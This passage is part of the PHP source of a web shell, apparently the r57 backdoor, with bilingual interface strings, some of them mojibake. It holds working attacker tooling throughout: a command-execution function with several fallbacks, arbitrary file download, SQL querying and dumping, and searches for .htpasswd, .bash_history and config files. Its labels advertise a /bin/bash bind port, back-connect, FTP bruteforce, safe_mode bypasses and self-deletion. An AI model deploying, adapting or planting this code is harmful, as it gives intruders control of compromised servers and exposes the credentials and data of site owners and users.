  • 10. foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this- >columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw
  • 11. =='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw =='; @ob_clean(); header("Content-type: image/gif"); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ] </b></font></div>"; die(); } if ($_POST['cmd']=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Can't connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=orange><b>Can't select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=white><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  • 12. { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>". $sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b>&nbsp;". $keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'. $values.'&nbsp;</font></td></tr>'; } echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(! empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); } if(isset($_GET['tmp'])) {
  • 13. @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return '<i>no value</i>'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '<table width=100%>', '<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Directive</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Local Value</b></div></font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2 color=orange><div align=center><b>Master Value</b></div></font></td></tr>'; foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'. $key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></ div></font></td></tr>'; } echo $r; echo '</table>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['cpu'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2 color=orange><b>CPU</b></font></div></td></tr></table><table
  • 14. width=100%>'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['mem'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#3A6EA5><div align=center><font face=Verdana size=-2 color=orange><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } $lang=array( 'ru_text1' =>'ÃEûïîëÃÃ¥ÃÃà ÿ êîìà Ãäà ', 'ru_text2' =>'ÃEûïîëÃÃ¥Ãèå êîìà Ãä Ãà ñåðâåðå', 'ru_text3' =>'Ã'ûïîëÃèòü êîìà Ãäó',
  • 15. 'ru_text4' =>'Ðà áî÷à ÿ äèðåêòîðèÿ', 'ru_text5' =>'Çà ãðóçêà åà éëîâ Ãà ñåðâåð', 'ru_text6' =>'Ëîêà ëüÃûé åà éë', 'ru_text7' =>'Àëèà ñû', 'ru_text8' =>'Àûáåðèòå à ëèà ñ', 'ru_butt1' =>'ÀûïîëÃèòü', 'ru_butt2' =>'Çà ãðóçèòü', 'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', 'ru_text10'=>'Îòêðûòü ïîðò', 'ru_text11'=>'Ïà ðîëü äëÿ äîñòóïà ', 'ru_butt3' =>'Îòêðûòü', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-à äðåñ', 'ru_text14'=>'Ïîðò', 'ru_butt4' =>'ÏûïîëÃèòü', 'ru_text15'=>'Çà ãðóçêà åà éëîâ ñ óäà ëåÃÃîãî ñåðâåðà ', 'ru_text16'=>'Èñïîëüçîâà òü', 'ru_text17'=>'Óäà ëåÃÃûé åà éë', 'ru_text18'=>'Ëîêà ëüÃûé åà éë', 'ru_text19'=>'Exploits', 'ru_text20'=>'Èñïîëüçîâà òü', 'ru_text21'=>'Íîâîå èìÿ', 'ru_text22'=>'datapipe', 'ru_text23'=>'Ëîêà ëüÃûé ïîðò', 'ru_text24'=>'Óäà ëåÃÃûé õîñò', 'ru_text25'=>'Óäà ëåÃÃûé ïîðò', 'ru_text26'=>'Èñïîëüçîâà òü', 'ru_butt5' =>'Çà ïóñòèòü', 'ru_text28'=>'Ðà áîòà â safe_mode', 'ru_text29'=>'Äîñòóï çà ïðåùåÃ', 'ru_butt6' =>'ÑìåÃèòü', 'ru_text30'=>'Ïðîñìîòð åà éëà ', 'ru_butt7' =>'Ïûâåñòè', 'ru_text31'=>'Ôà éë ÃÃ¥ Ãà éäåÃ', 'ru_text32'=>'ÔûïîëÃÃ¥Ãèå PHP êîäà ', 'ru_text33'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé open_basedir ÷åðåç åóÃêöèè cURL', 'ru_butt8' =>'Ïðîâåðèòü', 'ru_text34'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç åóÃêöèþ include', 'ru_text35'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç çà ãðóçêó åà éëà â mysql', 'ru_text36'=>'Áà çà . Òà áëèöà ', 'ru_text37'=>'ËîãèÃ', 'ru_text38'=>'Ïà ðîëü', 'ru_text39'=>'Áà çà ', 'ru_text40'=>'Äà ìï òà áëèöû áà çû äà ÃÃûõ', 'ru_butt9' =>'Äà ìï', 'ru_text41'=>'Ñîõðà Ãèòü â åà éëå', 'ru_text42'=>'Ðåäà êòèðîâà Ãèå åà éëà ', 'ru_text43'=>'Ðåäà êòèðîâà òü åà éë', 'ru_butt10'=>'Ñîõðà Ãèòü', 'ru_butt11'=>'Ðåäà êòèðîâà òü', 'ru_text44'=>'Ðåäà êòèðîâà Ãèå åà éëà ÃåâîçìîæÃî! Äîñòóï òîëüêî äëÿ ÷òåÃèÿ!', 'ru_text45'=>'Ôà éë ñîõðà ÃÃ¥Ã', 'ru_text46'=>'Ïðîñìîòð phpinfo()', 'ru_text47'=>'Ïðîñìîòð Ãà ñòðîåê php.ini', 'ru_text48'=>'Óäà ëåÃèå âðåìåÃÃûõ åà éëîâ',
  • 16. 'ru_text49'=>'Óäà ëåÃèå ñêðèïòà ñ ñåðâåðà ', 'ru_text50'=>'ÈÃåîðìà öèÿ î ïðîöåññîðå', 'ru_text51'=>'ÈÃåîðìà öèÿ î ïà ìÿòè', 'ru_text52'=>'Òåêñò äëÿ ïîèñêà ', 'ru_text53'=>'Èñêà òü â ïà ïêå', 'ru_text54'=>'Ïîèñê òåêñòà â åà éëà õ', 'ru_butt12'=>'Íà éòè', 'ru_text55'=>'Òîëüêî â åà éëà õ', 'ru_text56'=>'Íè÷åãî ÃÃ¥ Ãà éäåÃî', 'ru_text57'=>'Ñîçäà òü/Óäà ëèòü Ôà éë/Äèðåêòîðèþ', 'ru_text58'=>'Èìÿ', 'ru_text59'=>'Ôà éë', 'ru_text60'=>'Äèðåêòîðèþ', 'ru_butt13'=>'Ñîçäà òü/Óäà ëèòü', 'ru_text61'=>'Ôà éë ñîçäà Ã', 'ru_text62'=>'Äèðåêòîðèÿ ñîçäà Ãà ', 'ru_text63'=>'Ôà éë óäà ëåÃ', 'ru_text64'=>'Äèðåêòîðèÿ óäà ëåÃà ', 'ru_text65'=>'Ñîçäà òü', 'ru_text66'=>'Óäà ëèòü', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'Êîìà Ãäà ', 'ru_text69'=>'Ïà ðà ìåòð1', 'ru_text70'=>'Ïà ðà ìåòð2', 'ru_text71'=>"Ïòîðîé ïà ðà ìåòð êîìà Ãäû:rn- äëÿ CHOWN - èìÿ Ãîâîãî ïîëüçîâà òåëÿ èëè åãî UID (÷èñëîì) rn- äëÿ êîìà Ãäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) rn- äëÿ êîìà Ãäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷Ãîì ïà °Ã¥Ã¤Ã±Ã²Ã âëåÃèè (Ãà ïðèìåð 0777)", 'ru_text72'=>'Òåêñò äëÿ ïîèñêà ', 'ru_text73'=>'Èñêà òü â ïà ïêå', 'ru_text74'=>'Èñêà òü â åà éëà õ', 'ru_text75'=>'* ìîæÃî èñïîëüçîâà òü ðåãóëÿðÃîå âûà °Ã æåÃèå', 'ru_text76'=>'Ïîèñê òåêñòà â åà éëà õ ñ ïîìîùüþ óòèëèòû find', 'ru_text80'=>'Òèï', 'ru_text81'=>'Ñåòü', 'ru_text82'=>'Áà çû äà ÃÃûõ', 'ru_text83'=>'ÁûïîëÃÃ¥Ãèå SQL çà ïðîñà ', 'ru_text84'=>'SQL çà ïðîñ', 'ru_text85'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ãè÷åÃ- èé safe_mode ÷åðåç âûïîëÃÃ¥Ãèå êîìà Ãä â MSSQL ñåðâåðå', 'ru_text86'=>'Ñêà ÷èâà Ãèå åà éëà ñ ñåðâåðà ', 'ru_butt14'=>'Ñêà ÷à òü', 'ru_text87'=>'Ñêà ÷èâà Ãèå åà éëîâ ñ óäà ëåÃÃîãî ftp-ñåðà ¢Ã¥Ã°Ã ', 'ru_text88'=>'FTP-ñåðâåð:ïîðò', 'ru_text89'=>'Ôà éë Ãà ftp ñåðâåðå', 'ru_text90'=>'Ðåæèì ïåðåäà ÷è', 'ru_text91'=>'Àðõèâèðîâà òü â', 'ru_text92'=>'áåç à ðõèâà öèè', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-áðóòåîðñ', 'ru_text95'=>'Ñïèñîê ïîëüçîâà òåëåé', 'ru_text96'=>'Íå óäà ëîñü ïîëó÷èòü ñïèñîê ïîëüçîà ¢Ã òåëåé', 'ru_text97'=>'ÏðîâåðåÃî êîìáèÃà öèé: ', 'ru_text98'=>'Óäà ÷Ãûõ ïîäêëþ÷åÃèé: ',
  • 17. 'ru_text99'=>'* â êà ÷åñòâå ëîãèÃà è ïà ðîëÿ èñïîëüçóåòñÿ èìÿ ïîëüçîâà òåëÿ èç /etc/passwd', 'ru_text100'=>'Îòïðà âêà åà éëîâ Ãà óäà ëåÃÃûé åòï ñåðà ¢Ã¥Ã°', 'ru_text101'=>'Èñïîëüçîâà òü òà êæå ïåðåâåðÃóòîå (user -> resu) èìÿ ïîëüçîâà òåëÿ â êà ÷åñòâå ïà ðîëÿ', 'ru_text102'=>'Ïî÷òà ', 'ru_text103'=>'Îòïðà âêà ïèñüìà ', 'ru_text104'=>'Îòïðà âêà åà éëà Ãà ïî÷òîâûé ÿùèê', 'ru_text105'=>'Êîìó', 'ru_text106'=>'Îò', 'ru_text107'=>'Òåìà ', 'ru_butt15'=>'Îòïðà âèòü', 'ru_text108'=>'Òåêñò ïèñüìà ', 'ru_text109'=>'ÑâåðÃóòü', 'ru_text110'=>'Ðà çâåðÃóòü', 'ru_text111'=>'SQL-Ñåðâåð : ïîðò', 'ru_text112'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode ÷åðåç èñïîëüçîâà Ãèå åóÃêöèè mb_send_mail', 'ru_text113'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode, ïðîñìîòð ëèñòèÃãà äèðåêòîðèé ñ èñïîëüçîâà Ãèåì imap_list', 'ru_text114'=>'Ïðîâåðêà âîçìîæÃîñòè îáõîäà îãðà Ã- è÷åÃèé safe_mode, ïðîñìîòð ñîäåðæèìîãî åà éëà ñ èñïîëüçîâà Ãèåì imap_body', /* --------------------------------------------------------------- */ 'eng_text1' =>'Komut uygula', 'eng_text2' =>'Server uzerinde komut uygula', 'eng_text3' =>'Komut calistir', 'eng_text4' =>'Bulunan dizin', 'eng_text5' =>'Servera dosya yukle', 'eng_text6' =>'Yerel dosya', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_butt1' =>'Uygula', 'eng_butt2' =>'Yukle', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_butt3' =>'Bind', 'eng_text12'=>'Arka kapi', 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_butt4' =>'Baglanti', 'eng_text15'=>'Uzak serverdan dosya yukle', 'eng_text16'=>'Ile', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Kullan', 'eng_text21'=>'&nbsp;New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Kullan', 'eng_butt5' =>'Calistir', 'eng_text28'=>'Su anki durum safe_mode',
  • 18. 'eng_text29'=>'ACCESS DENIED', 'eng_butt6' =>'Degistir', 'eng_text30'=>'Cat file', 'eng_butt7' =>'Goster', 'eng_text31'=>'Dosya bulunamadi', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'Test', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database . Tablo', 'eng_text37'=>'Giris', 'eng_text38'=>'Sifre', 'eng_text39'=>'Database', 'eng_text40'=>'Bosaltilacak database tablosu', 'eng_butt9' =>'Bosalt', 'eng_text41'=>'Bosaltilan dosyayi kaydet', 'eng_text42'=>'Dosyalari duzenle', 'eng_text43'=>'Dosya duzenle', 'eng_butt10'=>'Kaydet', 'eng_text44'=>'Duzenlenemiyor! Sadece okunuyor!', 'eng_text45'=>'Dosya kaydedildi', 'eng_text46'=>'Goster phpinfo()', 'eng_text47'=>'Degiskenleri goster php.ini', 'eng_text48'=>'Temp doslarini sil', 'eng_butt11'=>'Duzenle', 'eng_text49'=>'Serverdan script sil', 'eng_text50'=>'Islemci bilgisine bak', 'eng_text51'=>'Hafýza bilgisine bak', 'eng_text52'=>'Metin ara', 'eng_text53'=>'In dirs', 'eng_text54'=>'Dosyalarin icinde metin ara', 'eng_butt12'=>'Ara', 'eng_text55'=>'Dosyalarda', 'eng_text56'=>'Hicbirsey :(', 'eng_text57'=>'Yarat/Dosya sil/Dir', 'eng_text58'=>'isim', 'eng_text59'=>'dosya', 'eng_text60'=>'dir', 'eng_butt13'=>'Yarat/Sil', 'eng_text61'=>'Dosya yaratildi', 'eng_text62'=>'Dir created', 'eng_text63'=>'Dosya silindi', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Yarat', 'eng_text66'=>'Sil', 'eng_text67'=>'Chown/Chgrp/Chmod', 'eng_text68'=>'Komut', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UID rn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Metin icin ara', 'eng_text73'=>'Klasor icin ara', 'eng_text74'=>'Dosyalarin icinde ara', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text80'=>'Type', 'eng_text81'=>'Net',
  • 19. 'eng_text82'=>'Databases', 'eng_text83'=>'SQL da sorgula', 'eng_text84'=>'SQL sor', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Serverdan dosya indir', 'eng_butt14'=>'Indir', 'eng_text87'=>'Uzak ftp sunucusundan doysa indir', 'eng_text88'=>'FTP-server:port', 'eng_text89'=>'Ftp de dosya', 'eng_text90'=>'Transfer modu', 'eng_text91'=>'Arsivleme', 'eng_text92'=>'without archivation', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Kullanici listesi', 'eng_text96'=>'Can't get users list', 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre', 'eng_text100'=>'Uzak ftp sunucusuna dosya yolla', 'eng_text101'=>'Use reverse (user -> resu) login for password', 'eng_text102'=>'Mail', 'eng_text103'=>'Mail yolla', 'eng_text104'=>'Dosyayi maile yolla', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_butt15'=>'Yolla', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Goster', 'eng_text111'=>'SQL-Server : Port', 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail', 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list', 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body', ); /* Àëèà ñû êîìà Ãä Ïîçâîëÿþò èçáåæà òü ìÃîãîêðà òÃîãî Ãà áîðà îäÃèõ è òåõ-æå êîìà Ãä. ( Ñäåëà Ãî áëà ãîäà ðÿ ìîåé ïðèà °Ã®Ã¤Ãîé ëåÃè ) èû ìîæåòå ñà ìè äîáà âëÿòü èëè èçìåÃÿòü êîìà Ãäû. */ $aliases=array( 'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config* files'=>'find / -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"', 'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all service.pwd files'=>'find / -type f -name service.pwd',
  • 20. 'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find all .bash_history files'=>'find / -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find all .mysql_history files'=>'find / -type f -name .mysql_history', 'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'list file attributes on a Linux second extended file system'=>'lsattr -va', 'show opened ports'=>'netstat -an | grep -i listen', '---------------------------------------------------------------------------------- ------------------'=>'ls -la' ); $table_up1 = "<tr><td bgcolor=#3A6EA5><font face=Verdana size=-2><b><div align=center>:: "; $table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5>"; $table_end1 = "</td></tr>"; $arrow = " <font face=Wingdings color=gray>è</font>"; $lb = "<font color=black>[</font>"; $rb = "<font color=black>]</font>"; $font = "<font face=Verdana size=-2>"; $ts = "<table class=table1 width=100% align=center>"; $te = "</table>"; $fs = "<form name=form method=POST>"; $fe = "</form>"; if(isset($_GET['users'])) { if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=orange>". $lang[$language.'_text96']."</font></center>"; } else { echo '<center>'; foreach($users as $user) { echo $user."<br>"; } echo '</center>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } $dir = @getcwd(); $windows = 0; $unix = 0; if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; if(empty($dir)) { $os = getenv('OS'); if(empty($os)){ $os = php_uname(); } if(empty($os)){ $os ="-"; $unix=1; } else { if(@eregi("^win",$os)) { $windows = 1; } else { $unix = 1; } } }
  • 21. if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") { echo $head; if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } $sr->SearchText(0,0); $res = $sr->GetResultFiles(); $found = $sr->GetMatchesCount(); $titles = $sr->GetTitles(); $r = ""; if($found > 0) { $r .= "<TABLE width=100%>"; foreach($res as $file=>$v) { $r .= "<TR>"; $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); $r .= ($windows)? str_replace("/","",$file) : $file; $r .= "</b></font></ TD>"; $r .= "</TR>"; foreach($v as $a=>$b) { $r .= "<TR>"; $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></ TD>"; $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; $r .= "</TR>n"; } } $r .= "</TABLE>"; echo $r; } else { echo "<P align=center><B><font face=Verdana size=-2>". $lang[$language.'_text56']."</B></font></P>"; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=". $_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } $SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } function ws($i) { return @str_repeat("&nbsp;",$i); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res);
  • 22. } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; } function get_users() { $users = array(); $rows=file('/etc/passwd'); if(!$rows) return 0; foreach ($rows as $string) { $user = @explode(":",$string); if(substr($string,0,1)!='#') array_push($users,$user[0]); } return $users; } function we($i) { if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó çà ïèñà òü â åà éë '; } else { $text = "[-] ERROR! Can't write in file "; } echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>".$text. $i."</b></div></font></td></tr></table>"; return null; } function re($i) { if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà ! Íå ìîãó ïà °Ã®Ã·Ã¨Ã²Ã òü åà éë '; } else { $text = "[-] ERROR! Can't read file "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text.$i."</b></div></font></td></tr></table>"; return null;
  • 23. } function ce($i) { if($GLOBALS['language']=="ru"){ $text = "Íå óäà ëîñü ñîçäà òü "; } else { $text = "Can't create "; } echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text.$i."</b></div></font></td></tr></table>"; return null; } function fe($l,$n) { $text['ru'] = array('Íå óäà ëîñü ïîäêëþ÷èòüñÿ ê ftp ñåðà ¢Ã¥Ã°Ã³','Îøèáêà à âòîðèçà öèè Ãà ftp ñåðâåðå','Íå óäà ëîñü ïîìåÃÿòü äèðåêòîðèþ Ãà ftp ñåðâåðå'); $text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can't change dir on ftp server'); echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#3A6EA5><font color=orange face=Verdana size=-2><div align=center><b>". $text[$l][$n]."</b></div></font></td></tr></table>"; return null; } function mr($l,$n) { $text['ru'] = array('Íå óäà ëîñü îòïðà âèòü ïèñüìî','Ïèñüìî îòïðà âëåÃî'); $text['eng'] = array('Can't send 